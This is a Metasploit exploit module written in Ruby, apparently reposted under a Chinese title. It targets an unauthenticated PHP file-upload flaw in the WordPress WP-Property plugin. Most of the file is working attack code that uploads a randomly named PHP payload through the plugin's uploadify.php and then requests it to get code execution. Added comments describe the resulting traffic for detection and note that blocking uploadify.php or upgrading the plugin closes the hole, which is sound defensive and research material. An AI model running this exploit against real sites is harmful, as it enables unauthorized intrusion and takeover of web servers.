WordPress WP-Property PHP 文件上传漏洞
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

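require 'msf/core'
require 'msf/core/exploit/php_exe'

# Metasploit module for the unauthenticated file upload in the WordPress
# WP-Property plugin (<= 1.35.0 according to the module description).
#
# The plugin ships third-party/uploadify/uploadify.php, which accepts a
# multipart upload without authentication. An uploaded .php file can then be
# requested over HTTP, which is what turns the upload into code execution.
#
# What the traffic looks like, as built by the requests below (useful when
# writing detections or reviewing web server logs):
# - a POST to <wordpress>/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php
#   with a "Filedata" file part whose filename ends in .php and a "folder" part
#   naming the uploadify directory;
# - followed by a GET for the path echoed back in the upload response.
#
# Removing or blocking access to uploadify.php, or moving the plugin to a
# release outside the affected range, closes the exposure.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  # The page text had this mangled to "Msf::Exploit:hpEXE"; the php_exe require
  # above and the get_write_exec_payload call in #exploit point to PhpEXE.
  include Msf::Exploit::PhpEXE

  # Path of the uploadify directory relative to the WordPress root.
  UPLOADIFY_DIR = 'wp-content/plugins/wp-property/third-party/uploadify/'.freeze

  # Registers module metadata (name, references, targets) and the TARGETURI
  # option that points at the WordPress installation.
  #
  # @param info [Hash] metadata overrides passed through to update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Probes for the presence of uploadify.php with a plain GET.
  #
  # Only the status code is looked at: a 200 shows the script is reachable, not
  # that the upload is accepted, so Appears is the strongest claim made here.
  #
  # @return [Exploit::CheckCode] Unknown on no response or a non-200 status,
  #   Appears otherwise
  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{wordpress_base}#{UPLOADIFY_DIR}uploadify.php"
    })

    return Exploit::CheckCode::Unknown unless res && res.code == 200

    Exploit::CheckCode::Appears
  end

  # Uploads a randomly named .php file through uploadify.php and then requests
  # the location the server reports back.
  #
  # Fails with UnexpectedReply when the upload response is missing, is not a
  # 200, or does not mention the uploaded file name.
  def exploit
    uri  = wordpress_base
    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self => true)

    # Two form fields: the file itself and the directory it should land in.
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}#{UPLOADIFY_DIR}", nil, nil, "form-data; name=\"folder\"")
    # Drop the empty line Rex emits before a boundary so the body parses as
    # standard multipart/form-data.
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}#{UPLOADIFY_DIR}uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The upload response body is used verbatim as the path to request next.
    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end

  private

  # TARGETURI path with exactly one trailing slash guaranteed, built without
  # mutating the string returned by target_uri.path.
  #
  # @return [String]
  def wordpress_base
    base = target_uri.path
    base.end_with?('/') ? base : "#{base}/"
  end
end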
不要问我这写的是什么 怎么利用 我是说msf.